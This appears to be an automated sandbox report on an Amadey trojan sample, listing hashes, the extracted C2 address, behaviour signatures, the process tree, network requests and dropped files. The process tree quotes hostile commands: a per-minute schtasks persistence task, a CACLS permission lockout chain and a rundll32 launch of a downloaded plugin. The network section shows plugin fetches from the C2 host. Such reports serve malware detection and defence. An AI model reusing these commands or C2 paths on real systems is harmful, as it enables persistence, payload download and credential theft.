Analysis

  • max time kernel
    110s
  • max time network
    148s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220901-en
  • resource tags

    arch:x64, arch:x86, image:win10v2004-20220901-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    08/02/2023, 18:16 UTC

General

  • Target: file.exe
  • Size: 567KB
  • MD5: e0a1f899c2cb1a72500436f5b8337e10
  • SHA1: 135b0fa36c2430aeedb175fc75dbc861032088da
  • SHA256: a251ecd0d64c00a88c41b8247952f68a31a7393775e6d962906de04cea2fc4f7
  • SHA512: c66a540fc8d5945300ccdcef67b64569c806afa42ecd8b6d73565c6938102359ecdaa66a5f69f60273b1db28dbf9e519a8b36720badec591d8a137b7304cfbf3
  • SSDEEP: 12288:HMrpy90XrDCOHH5p1EfO+BTHl4tVWS1jaleKHA9ZdD0J:OyEDCOnJERV2XW1eKG0J

Malware Config

Extracted

  • Family: amadey
  • Version: 3.66
  • C2: 62.204.41.4/Gol478Ns/index.php

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs 12 IoCs
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 7 IoCs
  • Loads dropped DLL 1 IoCs
  • Windows security modification 2 TTPs 3 IoCs
  • Adds Run key to start application 2 TTPs 4 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 41 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\file.exe
    "C:\Users\Admin\AppData\Local\Temp\file.exe"
    1⤵
    • Adds Run key to start application
    • Suspicious use of WriteProcessMemory
    PID:3796
    • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\bAFg.exe
      C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\bAFg.exe
      2⤵
      • Executes dropped EXE
      • Adds Run key to start application
      • Suspicious use of WriteProcessMemory
      PID:1884
      • C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\aAFl.exe
        C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\aAFl.exe
        3⤵
        • Modifies Windows Defender Real-time Protection settings
        • Executes dropped EXE
        • Windows security modification
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:3920
      • C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\nika.exe
        C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\nika.exe
        3⤵
        • Modifies Windows Defender Real-time Protection settings
        • Executes dropped EXE
        • Windows security modification
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2524
    • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\xriv.exe
      C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\xriv.exe
      2⤵
      • Checks computer location settings
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      PID:4576
      • C:\Users\Admin\AppData\Local\Temp\4b9a106e76\mnolyk.exe
        "C:\Users\Admin\AppData\Local\Temp\4b9a106e76\mnolyk.exe"
        3⤵
        • Checks computer location settings
        • Executes dropped EXE
        • Suspicious use of WriteProcessMemory
        PID:1856
        • C:\Windows\SysWOW64\schtasks.exe
          "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN mnolyk.exe /TR "C:\Users\Admin\AppData\Local\Temp\4b9a106e76\mnolyk.exe" /F
          4⤵
          • Creates scheduled task(s)
          PID:4496
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "mnolyk.exe" /P "Admin:N"&&CACLS "mnolyk.exe" /P "Admin:R" /E&&echo Y|CACLS "..\4b9a106e76" /P "Admin:N"&&CACLS "..\4b9a106e76" /P "Admin:R" /E&&Exit
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:2276
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /S /D /c" echo Y"
            5⤵
            PID:3120
          • C:\Windows\SysWOW64\cacls.exe
            CACLS "mnolyk.exe" /P "Admin:N"
            5⤵
            PID:1948
          • C:\Windows\SysWOW64\cacls.exe
            CACLS "mnolyk.exe" /P "Admin:R" /E
            5⤵
            PID:2456
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /S /D /c" echo Y"
            5⤵
            PID:2960
          • C:\Windows\SysWOW64\cacls.exe
            CACLS "..\4b9a106e76" /P "Admin:N"
            5⤵
            PID:3440
          • C:\Windows\SysWOW64\cacls.exe
            CACLS "..\4b9a106e76" /P "Admin:R" /E
            5⤵
            PID:1100
        • C:\Windows\SysWOW64\rundll32.exe
          "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\c1ec479e5342a2\clip64.dll, Main
          4⤵
          • Loads dropped DLL
          PID:4556
  • C:\Users\Admin\AppData\Local\Temp\4b9a106e76\mnolyk.exe
    C:\Users\Admin\AppData\Local\Temp\4b9a106e76\mnolyk.exe
    1⤵
    • Executes dropped EXE
    PID:3060
  • C:\Users\Admin\AppData\Local\Temp\4b9a106e76\mnolyk.exe
    C:\Users\Admin\AppData\Local\Temp\4b9a106e76\mnolyk.exe
    1⤵
    • Executes dropped EXE
    PID:1072

Network

  • flag: ru
    POST http://62.204.41.4/Gol478Ns/index.php
    Process: mnolyk.exe
    Remote address: 62.204.41.4:80
    Request
    POST /Gol478Ns/index.php HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    Host: 62.204.41.4
    Content-Length: 89
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Server: nginx/1.18.0 (Ubuntu)
    Date: Wed, 08 Feb 2023 18:16:42 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
  • flag: ru
    GET http://62.204.41.4/Gol478Ns/Plugins/cred64.dll
    Process: mnolyk.exe
    Remote address: 62.204.41.4:80
    Request
    GET /Gol478Ns/Plugins/cred64.dll HTTP/1.1
    Host: 62.204.41.4
    Response
    HTTP/1.1 404 Not Found
    Server: nginx/1.18.0 (Ubuntu)
    Date: Wed, 08 Feb 2023 18:17:31 GMT
    Content-Type: text/html
    Content-Length: 162
    Connection: keep-alive
  • flag: ru
    GET http://62.204.41.4/Gol478Ns/Plugins/clip64.dll
    Process: mnolyk.exe
    Remote address: 62.204.41.4:80
    Request
    GET /Gol478Ns/Plugins/clip64.dll HTTP/1.1
    Host: 62.204.41.4
    Response
    HTTP/1.1 200 OK
    Server: nginx/1.18.0 (Ubuntu)
    Date: Wed, 08 Feb 2023 18:17:31 GMT
    Content-Type: application/octet-stream
    Content-Length: 91136
    Last-Modified: Fri, 03 Feb 2023 17:19:21 GMT
    Connection: keep-alive
    ETag: "63dd4219-16400"
    Accept-Ranges: bytes
  • 20.189.173.15:443
    322 B sent, 7 packets
  • 62.204.41.4:80
    http://62.204.41.4/Gol478Ns/Plugins/clip64.dll
    Protocol: http
    Process: mnolyk.exe
    3.9kB sent, 94.9kB received, 76 packets sent, 75 received
    HTTP Request: POST http://62.204.41.4/Gol478Ns/index.php
    HTTP Response: 200
    HTTP Request: GET http://62.204.41.4/Gol478Ns/Plugins/cred64.dll
    HTTP Response: 404
    HTTP Request: GET http://62.204.41.4/Gol478Ns/Plugins/clip64.dll
    HTTP Response: 200
  • 2.18.109.224:443
    322 B sent, 7 packets
Downloads

  • C:\Users\Admin\AppData\Local\Temp\4b9a106e76\mnolyk.exe
    Filesize: 236KB
    MD5: 8bb923c4d81284daef7896e5682df6c6
    SHA1: 67e34a96b77e44b666c5479f540995bdeacf5de2
    SHA256: 9b0410052289a8416a458401fbb9a74d6361f4769465431b209f32151d7c6f21
    SHA512: 2daed03277a343db5fcb22e26baea5cda41de39dc825fe0aad51f6ec181b8f38f09427f27fb58ffd179f37032600d107ef772cc6275f7d0d62899c6cd3f8aff7

  • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\bAFg.exe
    Filesize: 380KB
    MD5: 1a9853416aa9e8810255d210fada5dec
    SHA1: 035f92f139d9f36f21a01955c8103c7e42709ee3
    SHA256: 75d95d28e1b7ffd920686a866073be94cd1435db280ebeb9809c6c9be5830028
    SHA512: 27ac133af108bb6da193760493423b0dd136036fc3d13bd5a0cb3f5c710c15bbba2b3fee8285719601c2632c4ec14db48ee3f1d15ce26e3595d4613dfd499c3f

  • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\xriv.exe
    Filesize: 236KB
    MD5: 8bb923c4d81284daef7896e5682df6c6
    SHA1: 67e34a96b77e44b666c5479f540995bdeacf5de2
    SHA256: 9b0410052289a8416a458401fbb9a74d6361f4769465431b209f32151d7c6f21
    SHA512: 2daed03277a343db5fcb22e26baea5cda41de39dc825fe0aad51f6ec181b8f38f09427f27fb58ffd179f37032600d107ef772cc6275f7d0d62899c6cd3f8aff7

  • C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\aAFl.exe
    Filesize: 364KB
    MD5: 06e19bf4f39f6e632d91be87a226312a
    SHA1: cd0e1696ff00afb7d024eec8213a8f4e0228765c
    SHA256: 9b6b4589bf5411e47f02676d798e11b09d09980915210184c72c4b2f75203fdd
    SHA512: 0a52a1a2662a1781b5c41f82c542126c1d23854cb1b9a49c729241bd3de4d0a8feedc7dee1609429b3e0465a473e9d8e27ea28dfc4a41abec8ae3931f73f422c

  • C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\nika.exe
    Filesize: 11KB
    MD5: 7e93bacbbc33e6652e147e7fe07572a0
    SHA1: 421a7167da01c8da4dc4d5234ca3dd84e319e762
    SHA256: 850cd190aaeebcf1505674d97f51756f325e650320eaf76785d954223a9bee38
    SHA512: 250169d7b6fcebff400be89edae8340f14130ced70c340ba9da9f225f62b52b35f6645bfb510962efb866f988688cb42392561d3e6b72194bc89d310ea43aa91

  • C:\Users\Admin\AppData\Roaming\c1ec479e5342a2\clip64.dll
    Filesize: 89KB
    MD5: c79b74d8fec5e7e2ba2f1789fd582a15
    SHA1: 78a1e5d99dbaccc5e07b125e1dfb280112cb3128
    SHA256: b5bd049d32f0faeea6ce65a0f0d326de5bc4427a7c1ad24bfb0ea050c1dec7d3
    SHA512: 0debfc54904fd538cfb1fc648d18f90a991337200b3decf74b28ac2f341843fb3bab4f45bc92cfec333b18dfff9cc136854462e79054a39926a7bd8ee2e057ba

  • memory/2524-149-0x00007FF984230000-0x00007FF984CF1000-memory.dmp
    Filesize: 10.8MB
  • memory/2524-148-0x00007FF984230000-0x00007FF984CF1000-memory.dmp
    Filesize: 10.8MB
  • memory/2524-147-0x0000000000970000-0x000000000097A000-memory.dmp
    Filesize: 40KB
  • memory/3920-141-0x0000000000400000-0x000000000059A000-memory.dmp
    Filesize: 1.6MB
  • memory/3920-143-0x0000000000400000-0x000000000059A000-memory.dmp
    Filesize: 1.6MB
  • memory/3920-142-0x00000000006A3000-0x00000000006C3000-memory.dmp
    Filesize: 128KB
  • memory/3920-140-0x00000000021D0000-0x00000000021FD000-memory.dmp
    Filesize: 180KB
  • memory/3920-139-0x00000000006A3000-0x00000000006C3000-memory.dmp
    Filesize: 128KB
  • memory/3920-138-0x0000000004BA0000-0x0000000005144000-memory.dmp
    Filesize: 5.6MB
